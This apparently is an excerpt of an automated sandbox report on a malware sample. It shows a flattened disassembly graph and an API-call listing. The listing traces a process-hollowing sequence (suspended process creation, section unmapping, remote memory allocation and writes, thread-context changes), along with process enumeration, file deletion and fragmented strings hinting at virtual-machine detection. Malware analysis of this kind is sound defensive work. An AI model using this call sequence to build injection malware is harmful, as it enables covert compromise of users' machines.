2588->2585 2589 40ac10 PtVisible 3602 40a190 3603 40a198 ReleaseCapture 3602->3603 2590 409e20 2591 409e47 2590->2591 2592 409eaf CreateCompatibleDC 2591->2592 2604 409f5c 2591->2604 2594 40b05a 2592->2594 2593 409f76 GetWindowRect 2595 409f99 2593->2595 2596 409ece LPtoDP CreateCompatibleBitmap 2594->2596 2606 401040 CopyRect 2595->2606 2597 409f0b 2596->2597 2600 409f19 GetMapMode 2597->2600 2599 409fab 2603 409fc3 BitBlt 2599->2603 2605 40a009 2599->2605 2601 40b054 2600->2601 2602 409f32 DPtoLP 2601->2602 2602->2604 2603->2605 2604->2593 2937 4039c0 2606->2937 2608 401071 CopyRect 2943 404670 2608->2943 2610 401091 CopyRect 2611 4039c0 3 API calls 2610->2611 2612 4010b1 CopyRect 2611->2612 2613 404670 3 API calls 2612->2613 2614 4010d1 CopyRect 2613->2614 2615 4039c0 3 API calls 2614->2615 2616 4010f1 CopyRect 2615->2616 2617 404670 3 API calls 2616->2617 2618 401111 CopyRect 2617->2618 2619 4039c0 3 API calls 2618->2619 2620 401131 CopyRect 2619->2620 2621 404670 3 API calls 2620->2621 2622 401151 CopyRect 2621->2622 2623 4039c0 3 API calls 2622->2623 2624 401171 CopyRect 2623->2624 2625 404670 3 API calls 2624->2625 2626 401191 CopyRect 2625->2626 2627 4039c0 3 API calls 2626->2627 2628 4011b1 CopyRect 2627->2628 2629 404670 3 API calls 2628->2629 2630 4011d1 CopyRect 2629->2630 2631 4039c0 3 API calls 2630->2631 2632 4011f1 CopyRect 2631->2632 2633 404670 3 API calls 2632->2633 2634 401211 CopyRect 2633->2634 2635 4039c0 3 API calls 2634->2635 2636 401231 CopyRect 2635->2636 2637 404670 3 API calls 2636->2637 2638 401251 CopyRect 2637->2638 2639 4039c0 3 API calls 2638->2639 2640 401271 CopyRect 2639->2640 2641 404670 3 API calls 2640->2641 2642 401291 CopyRect 2641->2642 2643 4039c0 3 API calls 2642->2643 2644 4012b1 CopyRect 2643->2644 2645 404670 3 API calls 2644->2645 2646 4012d1 CopyRect 2645->2646 2647 4039c0 3 API calls 2646->2647 2648 4012f1 CopyRect 2647->2648 2649 404670 3 API calls 2648->2649 2650 401311 CopyRect 2649->2650 2651 4039c0 3 API calls 2650->2651 2652 401331 CopyRect 2651->2652 2653 404670 3 API calls 2652->2653 2654 401351 CopyRect 2653->2654 2655 4039c0 3 API calls 2654->2655 2656 401371 CopyRect 2655->2656 2657 404670 3 API calls 2656->2657 2658 401391 CopyRect 2657->2658 2659 4039c0 3 API calls 2658->2659 2660 4013b1 CopyRect 2659->2660 2661 404670 3 API calls 2660->2661 2662 4013d1 CopyRect 2661->2662 2663 4039c0 3 API calls 2662->2663 2664 4013f1 CopyRect 2663->2664 2665 404670 3 API calls 2664->2665 2666 401411 CopyRect 2665->2666 2667 4039c0 3 API calls 2666->2667 2668 401431 CopyRect 2667->2668 2669 404670 3 API calls 2668->2669 2670 401451 CopyRect 2669->2670 2671 4039c0 3 API calls 2670->2671 2672 401471 CopyRect 2671->2672 2673 404670 3 API calls 2672->2673 2674 401491 CopyRect 2673->2674 2675 4039c0 3 API calls 2674->2675 2676 4014b1 CopyRect 2675->2676 2677 404670 3 API calls 2676->2677 2678 4014d1 CopyRect 2677->2678 2679 4039c0 3 API calls 2678->2679 2680 4014f1 CopyRect 2679->2680 2681 404670 3 API calls 2680->2681 2682 401511 CopyRect 2681->2682 2683 4039c0 3 API calls 2682->2683 2684 401531 CopyRect 2683->2684 2685 404670 3 API calls 2684->2685 2686 401551 CopyRect 2685->2686 2687 4039c0 3 API calls 2686->2687 2688 401571 CopyRect 2687->2688 2689 404670 3 API calls 2688->2689 2690 401591 CopyRect 2689->2690 2691 4039c0 3 API calls 2690->2691 2692 4015b1 CopyRect 2691->2692 2693 404670 3 API calls 2692->2693 2694 4015d1 CopyRect 2693->2694 2695 4039c0 3 API calls 2694->2695 2696 4015f1 CopyRect 2695->2696 2697 404670 3 API calls 2696->2697 2698 401611 CopyRect 2697->2698 2699 4039c0 3 API calls 2698->2699 2700 401631 CopyRect 2699->2700 2701 404670 3 API calls 2700->2701 2702 401651 CopyRect 2701->2702 2703 4039c0 3 API calls 2702->2703 2704 401671 CopyRect 2703->2704 2705 404670 3 API calls 2704->2705 2706 401691 CopyRect 2705->2706 2707 4039c0 3 API calls 2706->2707 2708 4016b1 CopyRect 2707->2708 2709 404670 3 API calls 2708->2709 2710 4016d1 CopyRect 2709->2710 2711 4039c0 3 API calls 2710->2711 2712 4016f1 CopyRect 2711->2712 2713 404670 3 API calls 2712->2713 2714 401711 CopyRect 2713->2714 2715 4039c0 3 API calls 2714->2715 2716 401731 CopyRect 2715->2716 2717 404670 3 API calls 2716->2717 2718 401751 CopyRect 2717->2718 2719 4039c0 3 API calls 2718->2719 2720 401771 CopyRect 2719->2720 2721 404670 3 API calls 2720->2721 2722 401791 CopyRect 2721->2722 2723 4039c0 3 API calls 2722->2723 2724 4017b1 CopyRect 2723->2724 2725 404670 3 API calls 2724->2725 2726 4017d1 CopyRect 2725->2726 2727 4039c0 3 API calls 2726->2727 2728 4017f1 CopyRect 2727->2728 2729 404670 3 API calls 2728->2729 2730 401811 CopyRect 2729->2730 2731 4039c0 3 API calls 2730->2731 2732 401831 CopyRect 2731->2732 2733 404670 3 API calls 2732->2733 2734 401851 CopyRect 2733->2734 2735 4039c0 3 API calls 2734->2735 2736 401871 CopyRect 2735->2736 2737 404670 3 API calls 2736->2737 2738 401891 CopyRect 2737->2738 2739 4039c0 3 API calls 2738->2739 2740 4018b1 CopyRect 2739->2740 2741 404670 3 API calls 2740->2741 2742 4018d1 CopyRect 2741->2742 2743 4039c0 3 API calls 2742->2743 2744 4018f1 CopyRect 2743->2744 2745 404670 3 API calls 2744->2745 2746 401911 CopyRect 2745->2746 2747 4039c0 3 API calls 2746->2747 2748 401931 CopyRect 2747->2748 2749 404670 3 API calls 2748->2749 2750 401951 CopyRect 2749->2750 2751 4039c0 3 API calls 2750->2751 2752 401971 CopyRect 2751->2752 2753 404670 3 API calls 2752->2753 2754 401991 CopyRect 2753->2754 2755 4039c0 3 API calls 2754->2755 2756 4019b1 CopyRect 2755->2756 2757 404670 3 API calls 2756->2757 2758 4019d1 CopyRect 2757->2758 2759 4039c0 3 API calls 2758->2759 2760 4019f1 CopyRect 2759->2760 2761 404670 3 API calls 2760->2761 2762 401a11 CopyRect 2761->2762 2763 4039c0 3 API calls 2762->2763 2764 401a31 CopyRect 2763->2764 2765 404670 3 API calls 2764->2765 2766 401a51 CopyRect 2765->2766 2767 4039c0 3 API calls 2766->2767 2768 401a71 CopyRect 2767->2768 2769 404670 3 API calls 2768->2769 2770 401a91 CopyRect 2769->2770 2771 4039c0 3 API calls 2770->2771 2772 401ab1 CopyRect 2771->2772 2773 404670 3 API calls 2772->2773 2774 401ad1 CopyRect 2773->2774 2775 4039c0 3 API calls 2774->2775 2776 401af1 CopyRect 2775->2776 2777 404670 3 API calls 2776->2777 2778 401b11 CopyRect 2777->2778 2779 4039c0 3 API calls 2778->2779 2780 401b31 CopyRect 2779->2780 2781 404670 3 API calls 2780->2781 2782 401b51 CopyRect 2781->2782 2783 4039c0 3 API calls 2782->2783 2784 401b71 CopyRect 2783->2784 2785 404670 3 API calls 2784->2785 2786 401b91 CopyRect 2785->2786 2787 4039c0 3 API calls 2786->2787 2788 401bb1 CopyRect 2787->2788 2789 404670 3 API calls 2788->2789 2790 401bd1 CopyRect 2789->2790 2791 4039c0 3 API calls 2790->2791 2792 401bf1 CopyRect 2791->2792 2793 404670 3 API calls 2792->2793 2794 401c11 CopyRect 2793->2794 2795 4039c0 3 API calls 2794->2795 2796 401c31 CopyRect 2795->2796 2797 404670 3 API calls 2796->2797 2798 401c51 CopyRect 2797->2798 2799 4039c0 3 API calls 2798->2799 2800 401c71 CopyRect 2799->2800 2801 404670 3 API calls 2800->2801 2802 401c91 CopyRect 2801->2802 2803 4039c0 3 API calls 2802->2803 2804 401cb1 CopyRect 2803->2804 2805 404670 3 API calls 2804->2805 2806 401cd1 CopyRect 2805->2806 2807 4039c0 3 API calls 2806->2807 2808 401cf1 CopyRect 2807->2808 2809 404670 3 API calls 2808->2809 2810 401d11 CopyRect 2809->2810 2811 4039c0 3 API calls 2810->2811 2812 401d31 CopyRect 2811->2812 2813 404670 3 API calls 2812->2813 2814 401d51 CopyRect 2813->2814 2815 4039c0 3 API calls 2814->2815 2816 401d71 CopyRect 2815->2816 2817 404670 3 API calls 2816->2817 2818 401d91 CopyRect 2817->2818 2819 4039c0 3 API calls 2818->2819 2820 401db1 CopyRect 2819->2820 2821 404670 3 API calls 2820->2821 2822 401dd1 CopyRect 2821->2822 2823 4039c0 3 API calls 2822->2823 2824 401df1 CopyRect 2823->2824 2825 404670 3 API calls 2824->2825 2826 401e11 CopyRect 2825->2826 2827 4039c0 3 API calls 2826->2827 2828 401e31 CopyRect 2827->2828 2829 404670 3 API calls 2828->2829 2830 401e51 CopyRect 2829->2830 2831 4039c0 3 API calls 2830->2831 2832 401e71 CopyRect 2831->2832 2833 404670 3 API calls 2832->2833 2834 401e91 CopyRect 2833->2834 2835 4039c0 3 API calls 2834->2835 2836 401eb1 CopyRect 2835->2836 2837 404670 3 API calls 2836->2837 2838 401ed1 CopyRect 2837->2838 2839 4039c0 3 API calls 2838->2839 2840 401ef1 CopyRect 2839->2840 2841 404670 3 API calls 2840->2841 2842 401f11 CopyRect 2841->2842 2843 4039c0 3 API calls 2842->2843 2844 401f31 CopyRect 2843->2844 2845 404670 3 API calls 2844->2845 2846 401f51 CopyRect 2845->2846 2847 4039c0 3 API calls 2846->2847 2848 401f71 CopyRect 2847->2848 2849 404670 3 API calls 2848->2849 2850 401f91 CopyRect 2849->2850 2851 4039c0 3 API calls 2850->2851 2852 401fb1 CopyRect 2851->2852 2853 404670 3 API calls 2852->2853 2854 401fd1 CopyRect 2853->2854 2855 4039c0 3 API calls 2854->2855 2856 401ff1 CopyRect 2855->2856 2857 404670 3 API calls 2856->2857 2858 402011 CopyRect 2857->2858 2859 4039c0 3 API calls 2858->2859 2860 402031 CopyRect 2859->2860 2861 404670 3 API calls 2860->2861 2862 402051 CopyRect 2861->2862 2863 4039c0 3 API calls 2862->2863 2864 402071 CopyRect 2863->2864 2865 404670 3 API calls 2864->2865 2866 402091 CopyRect 2865->2866 2867 4039c0 3 API calls 2866->2867 2868 4020b1 CopyRect 2867->2868 2869 404670 3 API calls 2868->2869 2870 4020d1 CopyRect 2869->2870 2871 4039c0 3 API calls 2870->2871 2872 4020f1 CopyRect 2871->2872 2873 404670 3 API calls 2872->2873 2874 402111 CopyRect 2873->2874 2875 4039c0 3 API calls 2874->2875 2876 402131 CopyRect 2875->2876 2877 404670 3 API calls 2876->2877 2878 402151 CopyRect 2877->2878 2879 4039c0 3 API calls 2878->2879 2880 402171 CopyRect 2879->2880 2881 404670 3 API calls 2880->2881 2882 402191 CopyRect 2881->2882 2883 4039c0 3 API calls 2882->2883 2884 4021b1 CopyRect 2883->2884 2885 4039c0 3 API calls 2884->2885 2886 4021d1 CopyRect 2885->2886 2949 4040f0 2886->2949 2888 4021f1 CopyRect 2889 4039c0 3 API calls 2888->2889 2890 402211 CopyRect 2889->2890 2891 4040f0 3 API calls 2890->2891 2892 402231 CopyRect 2891->2892 2893 4039c0 3 API calls 2892->2893 2894 402251 CopyRect 2893->2894 2895 4040f0 3 API calls 2894->2895 2896 402271 CopyRect 2895->2896 2897 4040f0 3 API calls 2896->2897 2898 402291 CopyRect 2897->2898 2899 4039c0 3 API calls 2898->2899 2900 4022b1 CopyRect 2899->2900 2901 4040f0 3 API calls 2900->2901 2902 4022d1 CopyRect 2901->2902 2903 4039c0 3 API calls 2902->2903 2904 4022f1 CopyRect 2903->2904 2905 4040f0 3 API calls 2904->2905 2906 402311 CopyRect 2905->2906 2907 4039c0 3 API calls 2906->2907 2908 402331 CopyRect 2907->2908 2909 4040f0 3 API calls 2908->2909 2910 402351 CopyRect 2909->2910 2911 4040f0 3 API calls 2910->2911 2912 402371 CopyRect 2911->2912 2913 4040f0 3 API calls 2912->2913 2914 402391 CopyRect 2913->2914 2915 4039c0 3 API calls 2914->2915 2916 4023b1 CopyRect 2915->2916 2917 4039c0 3 API calls 2916->2917 2918 4023d1 CopyRect 2917->2918 2919 4040f0 3 API calls 2918->2919 2920 4023f1 CopyRect 2919->2920 2921 4039c0 3 API calls 2920->2921 2922 402411 CopyRect 2921->2922 2923 4039c0 3 API calls 2922->2923 2924 402431 CopyRect 2923->2924 2925 4040f0 3 API calls 2924->2925 2926 402451 CopyRect 2925->2926 2927 4040f0 3 API calls 2926->2927 2928 402471 CopyRect 2927->2928 2929 4039c0 3 API calls 2928->2929 2930 402491 CopyRect 2929->2930 2931 4040f0 3 API calls 2930->2931 2932 4024b1 CopyRect 2931->2932 2933 4040f0 3 API calls 2932->2933 2934 4024d1 CopyRect 2933->2934 2935 4040f0 3 API calls 2934->2935 2936 4024f1 2935->2936 2936->2599 2938 4039f4 2937->2938 2939 403b03 _ftol _ftol 2938->2939 2940 403b5e 2938->2940 2942 403bac 2938->2942 2939->2939 2939->2940 2941 403b90 Polygon 2940->2941 2941->2942 2942->2608 2944 4046a5 2943->2944 2945 404776 _ftol _ftol 2944->2945 2946 4047d8 2944->2946 2948 404805 2944->2948 2945->2945 2945->2946 2947 4047eb Polyline 2946->2947 2947->2948 2948->2610 2950 40412b 2949->2950 2951 40423e _ftol _ftol 2950->2951 2952 404299 2950->2952 2954 4042ed 2950->2954 2951->2951 2951->2952 2953 4042c9 PolyPolygon 2952->2953 2953->2954 2954->2888 3604 40ada0 EnableWindow 3605 40a7a0 GetWindowRect 3606 40a7c1 3605->3606 3607 404ec0 24 API calls 3606->3607 3608 40a7e1 SetCapture 3607->3608 3609 40a7f4 3608->3609 2582 40b261 _exit 3047 40b2e3 3048 40b2e8 3047->3048 3051 40b2ba 3048->3051 3052 40b2bf 3051->3052 3053 40b2d4 _setmbcp 3052->3053 3054 40b2dd 3052->3054 3053->3054 2334 405830 2337 40a1b0 2334->2337 2336 405856 2338 40a1d9 2337->2338 2339 40a1fd LoadIconA 2338->2339 2339->2336 2955 40ac30 RectVisible 3477 40acb0 TabbedTextOutA 3580 40a170 3583 40a090 3580->3583 3582 40a178 3584 40a0c8 BitBlt 3583->3584 3586 40a105 3583->3586 3584->3586 3586->3582 3587 40ad70 Escape 3589 40ad30 3590 40ad38 3589->3590 3591 40ad3b GrayStringA 3589->3591 3590->3591 3592 4057f0 3593 4057f5 3592->3593 3596 40b0c8 3593->3596 3599 40b09c 3596->3599 3598 40581a 3600 40b0b1 __dllonexit 3599->3600 3601 40b0a5 _onexit 3599->3601 3600->3598 3601->3598
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004074EA
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407500
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
                                                                        • LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
                                                                        • LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
                                                                        • LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
                                                                        • LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
                                                                        • LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
                                                                        • LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
                                                                        • LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
                                                                        • LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
                                                                        • wcscpy.MSVCRT ref: 00407B17
                                                                        • wcscpy.MSVCRT ref: 00407F50
                                                                        • wcscat.MSVCRT ref: 00407F7A
                                                                        • wcscpy.MSVCRT ref: 00407F8A
                                                                        • wcscat.MSVCRT ref: 00407F9E
                                                                        • wcscat.MSVCRT ref: 00408144
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
                                                                        • Wow64GetThreadContext.KERNEL32 ref: 004081A2
                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
                                                                        • VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
                                                                        • WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
                                                                        • Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
                                                                        • Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
                                                                        • wcscpy.MSVCRT ref: 00408760
                                                                        • wcscat.MSVCRT ref: 00408774
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
                                                                        • CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
                                                                        • ResumeThread.KERNELBASE(?), ref: 004087FC
                                                                        • Sleep.KERNELBASE(00000002), ref: 00408815
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
                                                                        • Module32First.KERNEL32(00000000,00000000), ref: 004088AC
                                                                        • strstr.MSVCRT ref: 004088D6
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 00408904
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040891F
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408930
                                                                        • ResumeThread.KERNELBASE(?), ref: 00408949
                                                                        • Sleep.KERNELBASE(00000002), ref: 0040894D
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408956
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040897B
                                                                        • Sleep.KERNELBASE(00000005), ref: 0040898A
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
                                                                        • wcscat.MSVCRT ref: 00408A5B
                                                                        • wcsstr.MSVCRT ref: 00408A82
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
                                                                        • TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
                                                                        • strstr.MSVCRT ref: 00408E02
                                                                        • strstr.MSVCRT ref: 00408E16
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
                                                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
                                                                        • CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                        • wcslen.MSVCRT ref: 00409045
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                        • wcscat.MSVCRT ref: 004090E9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                        • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                        • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                        • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
                                                                        • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                        • API String ID: 1831195861-1627083277
                                                                        • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                        • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                          • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                        • _ftol.MSVCRT ref: 0040A30F
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
